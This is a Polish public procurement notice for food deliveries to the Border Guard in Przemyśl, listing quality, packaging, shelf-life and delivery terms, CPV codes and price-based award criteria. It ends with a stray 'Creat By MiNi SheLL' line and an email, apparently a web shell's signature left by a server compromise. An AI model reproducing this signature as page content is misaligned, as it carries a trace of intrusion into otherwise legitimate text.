<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu. 
Szczegółowy opis przedmiotu zamówienia zawiera Tabela nr 3 - dla Pakietu III, dołączona do Druku ofertowego wg. formularza stanowiącego Załącznik nr 1 do SIWZ .
Jeżeli w SIWZ do opisania przedmiotu zamówienia użyto parametrów, oznaczeń wskazujących konkretnego producenta, konkretny produkt lub wskazano pochodzenie produktu, znaki towarowe itp., o których mowa w art. 30 ustawy, Zamawiający dopuszcza zastosowanie produktów równoważnych, pod warunkiem, że oferowane przez niego produkty spełniają wymagania określone przez Zamawiającego na co najmniej takim samym poziomie (nie gorszym), co opisany przez Zamawiającego w SIWZ.
W przypadku sytuacji o której mowa w tym punkcie, Zamawiający wymaga aby Wykonawca w tabeli dołączonej do druku ofertowego umieścił nazwę oferowanego produktu oraz producenta.
Jeżeli Wykonawca w dołączonej tabeli nie wpisze nazwy oferowanego produktu oraz producenta, wówczas Zamawiający uzna, iż Wykonawca zaoferował produkt o nazwie wskazanej przez Zamawiającego.
Zamawiający wymaga aby:
a)	Wykonawca dostarczał artykuły spożywcze spełniające wymogi jakościowe dla gatunku I i sanitarno - higieniczne, odpowiadające obowiązującym przepisom oraz wolne od wad tj.: kształt i wygląd zewnętrzny powinien być charakterystyczny dla danego rodzaju asortymentu. Smak i zapach powinien być charakterystyczny dla danego rodzaju wyrobu. Niedopuszczalny jest smak i zapach obcy. 
b)	Wykonawca dostarczał towar w oryginalnych opakowaniach jednostkowych i zbiorczych, wykonanych z materiałów przeznaczonych do kontaktu z żywnością, które mają mieć na opakowaniu czytelne oznaczenia fabryczne tzn. rodzaj, nazwę wyrobu, ilość, datę produkcji, termin przydatności do spożycia lub termin minimalnej trwałości, nazwę i adres producenta oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego,
c)	Wykonawca dostarczał artykuły spożywcze, które winne posiadać dla sortymentu określonego w Tabeli nr 3 co najmniej 90 dni okresu przydatności do spożycia.
Wykonawca będzie dostarczał towar do siedziby Zamawiającego na własny koszt i ryzyko, jego własnym transportem, przy zachowaniu odpowiednich reżimów sanitarnych wymaganych do przewozu żywności.
Zamawiający będzie składał zamówienia telefonicznie lub faxem najpóźniej na jeden dzień przed dostawą.
Zamówienia realizowane będą przeciętnie trzy razy w tygodniu,  w godzinach od 06.00 do godz. 12.00. Zamawiający zastrzega sobie prawo zwiększenia częstotliwości dostaw.
Zamawiający zastrzega sobie prawo w sytuacjach szczególnych korekty ilościowej i asortymentowej zamówienia najpóźniej do godz. 8.00 w dniu dostawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.41.00-3, 15.86.11.00-2, 15.83.12.00-4, 15.98.14.00-8, 15.84.23.00-5, 15.82.00.00-2, 15.32.16.00-0, 15.32.11.00-5, 15.82.12.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94.00</li>
<li>2. Termin płatności - 6.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com